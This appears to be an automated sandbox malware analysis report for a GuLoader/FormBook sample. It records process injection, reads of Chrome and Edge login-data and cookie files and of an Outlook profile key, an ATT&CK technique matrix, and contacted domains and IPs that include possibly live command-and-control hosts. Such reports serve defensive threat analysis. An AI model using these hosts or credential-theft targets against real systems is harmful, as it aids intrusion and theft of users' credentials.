        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
        Source: C:\Windows\SysWOW64\secinit.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832728590.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101763259.0000000001510000.00000002.00000001.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000000.79246703262.0000000001AE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00405D58 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,5_2_00405D58

        Stealing of Sensitive Information

        Source: Yara match | File source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\secinit.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\secinit.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match | File source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 312 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 6 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

        [Behavior graph: ID 1451684, Sample: fJuwM4Bwi7.exe, Startdate: 04/06/2024, Architecture: WINDOWS, Score: 100]

        Source | Detection | Scanner | Label | Link
        fJuwM4Bwi7.exe | 100% | Avira | TR/AD.NsisInject.ssylu |
        fJuwM4Bwi7.exe | 53% | ReversingLabs | Win32.Trojan.Guloader |
        fJuwM4Bwi7.exe | 55% | Virustotal | | Browse
        fJuwM4Bwi7.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll | 0% | ReversingLabs | |

        No Antivirus matches
                    • Avira URL Cloud: safe
                    unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    172.217.215.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                    91.195.240.123 | www.k4ryd.us | Germany | 47846 | SEDO-ASDE | false
                    3.64.163.50 | www.insist.site | United States | 16509 | AMAZON-02US | false
                    91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | false
                    92.205.8.26 | belgravevilla.com | Germany | 8972 | GD-EMEA-DC-SXB1DE | false
                    89.35.125.17 | www.auetravel.kz | Romania | 57495 | BSS-ONERO | false
                    192.3.27.169 | respirelavie.net | United States | 36352 | AS-COLOCROSSINGUS | false
                    173.232.18.161 | www.airportsurvery.com | United States | 62904 | EONIX-COMMUNICATIONS-ASBLOCK-62904US | false
                    142.250.217.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
                    203.161.49.193 | www.innovtech.life | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
                    66.81.203.196 | www.accentbathrooms.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
                    34.232.203.70 | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
                    162.43.104.164 | www.shun-yamagata.com | United States | 11333 | CYBERTRAILSUS | false
                    93.125.99.134 | brongal.by | Belarus | 6697 | BELPAK-ASBELPAKBY | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1451684
                    Start date and time:2024-06-04 14:12:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 17m 32s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                    Run name:Suspected Instruction Hammering
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Sample name:fJuwM4Bwi7.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/22@21/14
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 69%
                    • Number of executed functions: 53
                    • Number of non-executed functions: 255
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    08:15:34 | API Interceptor | 26003923x Sleep call for process: secinit.exe modified
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    91.195.240.123anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.lm2ue.us/n1wh/
                    Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    00773863008311110023.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                    • www.hylob.lat/s8o3/
                    OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • www.uc9d1.us/g0dh/
                    Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.cd14j.us/ntpp/
                    3.64.163.5002062024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.afelon.vote/oe02/
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.insist.site/8cwt/
                    po8909893299832.exeGet hashmaliciousFormBookBrowse
                    • www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ
                    Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                    • www.hitbass.com/uonn/
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.insist.site/8cwt/
                    Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    file.exeGet hashmaliciousUnknownBrowse
                    • protonmail.uk/admin
                    Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                    • www.buyduffelbag.com/pshj/
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    parkingpage.namecheap.com9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    TFMUpLhFq6.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    g7cydE7LET.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    cjHq1JOaAQ.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    vtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 91.195.240.19
                    CHKS2400304.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • 91.195.240.19
                    yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    www.auetravel.kzvtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 89.35.125.17
                    Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 89.35.125.17
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Konstabelens65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • 89.35.125.17
                    Stolprende.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Scries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    www.innovtech.lifeRFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    SCAN_0033245554672760018765524126524_pdf.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    RFQ _ARC 101011-24.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Scries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Fyge206.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    GD-EMEA-DC-SXB1DEcbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                    • 5.175.14.40
                    td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                    • 5.175.14.29
                    DEBIT NOTE.exeGet hashmaliciousFormBookBrowse
                    • 92.205.15.157
                    Purchase Order_20240503.exeGet hashmaliciousFormBookBrowse
                    • 92.205.15.157
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 92.205.8.26
                    G3K3YBC97i.elfGet hashmaliciousMiraiBrowse
                    • 62.138.132.196
                    61#U2467.htaGet hashmaliciousUnknownBrowse
                    • 92.205.182.151
                    Purchase Order_20240528.exeGet hashmaliciousFormBookBrowse
                    • 92.205.15.157
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 92.205.8.26
                    http://ageofimmortalsgame.com/wth1uGet hashmaliciousPhisherBrowse
                    • 92.205.17.86
                    SEDO-ASDE9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Utility R.lnkGet hashmaliciousFormBookBrowse
                    • 91.195.240.94
                    TFMUpLhFq6.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    g7cydE7LET.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    cjHq1JOaAQ.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    vtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 91.195.240.19
                    CHKS2400304.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • 91.195.240.19
                    BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    AMAZON-02USSecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                    • 3.160.212.118
                    SecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                    • 18.154.84.81
                    https://www.sordum.org/downloads/?ntfs-drive-protectionGet hashmaliciousUnknownBrowse
                    • 99.84.252.5
                    https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:be94af7a-734f-4324-8160-e952ef419173Get hashmaliciousUnknownBrowse
                    • 3.161.82.113
                    cbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                    • 65.0.142.153
                    td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                    • 52.63.237.70
                    https://tracking.onehash.ai/ck1/2d6f.fc070546be8e8d7/ad6e3f90-2201-11ef-a8f3-52540088df93/b97d490ee53087a42c557eeb7ff9083d627d161d/1?e=geyq9i%2FvDm1u0isQF8QbPz1WOrqZeXJHJMhVeeVO9X50%2BQM7uRftlmCGw%2FaXvkwb6LkXoSwWZnSRNZuu%2B7UvEZLIg7n2RDR5vSdrDOBIDsg%3DGet hashmaliciousPhisherBrowse
                    • 13.32.99.54
                    https://amex.applerewardsstore.com/sg/Get hashmaliciousUnknownBrowse
                    • 18.140.81.59
                    wget.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 54.247.62.1
                    https://flow.page/sharedfile.dcoGet hashmaliciousHTMLPhisherBrowse
                    • 18.239.69.18
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    SecuriteInfo.com.Win32.Malware-gen.15356.26888.exeGet hashmaliciousUnknownBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    SecuriteInfo.com.Win32.Malware-gen.11549.10024.exeGet hashmaliciousGuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    file.exeGet hashmaliciousVidarBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    SAMPLE _CATALOGUE_EWF_PDF.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    SALES CONF AH-SC-17-2024.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    PackingList#_2E0688.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    Quotation Request - RFQ018232901983234.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    Nedfrendes.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    Staff performance report..vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • 172.217.215.132
                    • 142.250.217.174
                    Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                    C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dllulACwpUCSU.exeGet hashmaliciousGuLoaderBrowse
                      Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          Factura 02297-23042024.exeGet hashmaliciousGuLoaderBrowse
                            anebilledes.exeGet hashmaliciousGuLoaderBrowse
                              Purchase Order1613400027654123.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                Purchase Order1613400027654123.pdf.exeGet hashmaliciousGuLoaderBrowse
                                  windows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                    windows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                      Category:dropped
                                      Size (bytes):938
                                      Entropy (8bit):3.289866599439299
                                      Encrypted:false
                                      SSDEEP:12:8wl0s0m/3BVSXzEXnOlLBAZlYK2jqW+fI5jjMEQ1J3HAG6asiNL4t2YCBTo:8AJ/Bbe2bYKY+fXpr3HAG6ap5JT
                                      MD5:A84F6E730E1D5326EB01F497F53DAB2E
                                      SHA1:30F308B045635A2D6A63BD6824F25064C396972E
                                      SHA-256:866411768908F473C83E380F7561BD2BB953114D43D41E0121239BF3CA14EA11
                                      SHA-512:3C21DC2A00FBCCB966D7A0059D42117006CBF4522F2837A25E9288A2E5B9B0D49ADF7F203CB3200663F4CC9EA6419F6D9EFEFE48EA8E07F8BDF56799D8D650F4
                                      Malicious:false
                                      Reputation:low
                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........system32..B............................................s.y.s.t.e.m.3.2.....P.1...........scups.<............................................s.c.u.p.s.....r.2...........deployerende.emb..R............................................d.e.p.l.o.y.e.r.e.n.d.e...e.m.b... ...3.....\.....\.....\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.s.c.u.p.s.\.d.e.p.l.o.y.e.r.e.n.d.e...e.m.b.D.C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.t.e.r.e.p.h.t.h.a.l.a.t.e.\.e.d.d.e.r.d.u.n.\.C.l.a.s.s.i.f.i.e.s.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.3.................
                                      Process:C:\Windows\SysWOW64\secinit.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):188416
                                      Entropy (8bit):0.9926780404836638
                                      Encrypted:false
                                      SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                      MD5:BE092D0FC1A86091764AABD40B25CB9E
                                      SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                      SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                      SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):50
                                      Entropy (8bit):4.558562939644915
                                      Encrypted:false
                                      SSDEEP:3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
                                      MD5:A6216EF9FBE57B11DEEB1B1FD840C392
                                      SHA1:E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
                                      SHA-256:EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
                                      SHA-512:AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
                                      Malicious:false
                                      Reputation:low
                                      Preview:[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):511485
                                      Entropy (8bit):7.044533587231225
                                      Encrypted:false
                                      SSDEEP:6144:AFdFKPS3s/UriKDyqFZ8q/Uj6iYTVhKstsXxp0TL6OOGUMpo6hcHaj3jkbHuZcwS:dNiiKDs0hKMsBprznM3fJi1d1
                                      MD5:34B8C0AB02B1A5D9BBAF2E7CE1648CE9
                                      SHA1:559CD53B51AAC1472556DD76CC4EA9164E07BE51
                                      SHA-256:A7FD65E8C394CDF18741BBAE01734AF85224455EDB117C92570F65612F8787C5
                                      SHA-512:328E716A7200B4CB6BA8D449000AD7F0E7C4D87D1E01C3A1FCA9B55C7DAE4EC586BAED92F04FF28F3C5D090C97A4FB7526FCE8D74E0B9101120BEB689C08CB7B
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):11264
                                      Entropy (8bit):5.779474184733856
                                      Encrypted:false
                                      SSDEEP:96:zPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+y:zPtkuWJX7zB3kGwfy0nyUVsxCjOM61u
                                      MD5:6F5257C0B8C0EF4D440F4F4FCE85FB1B
                                      SHA1:B6AC111DFB0D1FC75AD09C56BDE7830232395785
                                      SHA-256:B7CCB923387CC346731471B20FC3DF1EAD13EC8C2E3147353C71BB0BD59BC8B1
                                      SHA-512:A3CC27F1EFB52FB8ECDA54A7C36ADA39CEFEABB7B16F2112303EA463B0E1A4D745198D413EEBB3551E012C84A20DCDF4359E511E51BC3F1A60B13F1E3BAD1AA8
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: ulACwpUCSU.exe, Detection: malicious, Browse
                                      • Filename: Factura 02297-23042024.exe, Detection: malicious, Browse
                                      • Filename: anebilledes.exe, Detection: malicious, Browse
                                      • Filename: Factura 02297-23042024.exe, Detection: malicious, Browse
                                      • Filename: anebilledes.exe, Detection: malicious, Browse
                                      • Filename: Purchase Order1613400027654123.pdf.exe, Detection: malicious, Browse
                                      • Filename: Purchase Order1613400027654123.pdf.exe, Detection: malicious, Browse
                                      • Filename: windows.10.codec.pack.v2.2.0.setup.exe, Detection: malicious, Browse
                                      • Filename: windows.10.codec.pack.v2.2.0.setup.exe, Detection: malicious, Browse
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):3146
                                      Entropy (8bit):4.791974532841942
                                      Encrypted:false
                                      SSDEEP:48:3XPylQdRwtj51cUxE84gEsggxL3oW/xFJPDV4EFUXBR27Qy18ZC0n2pZ6tc73:al6RO51TE81mgl3oWJFJ9UXekyOZ2Omz
                                      MD5:63FE645623536FBA3E2331E03CC60A1C
                                      SHA1:236AFE8B9CE94209890C73329BCFEC36E2772F7B
                                      SHA-256:D214B61BCC0A292DF774AED4655752AF5ACB44E880BD82082AB716AE34DCEDBF
                                      SHA-512:EF6432B6D5107883F6CFA5EED753CA96BE4E59D89A883DA67D8112A7BA7950A3462F2DEE07228B89923569C727145396254C0EB10B84DFAE1632CEC17074413D
                                      Malicious:false
                                      Process:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1724
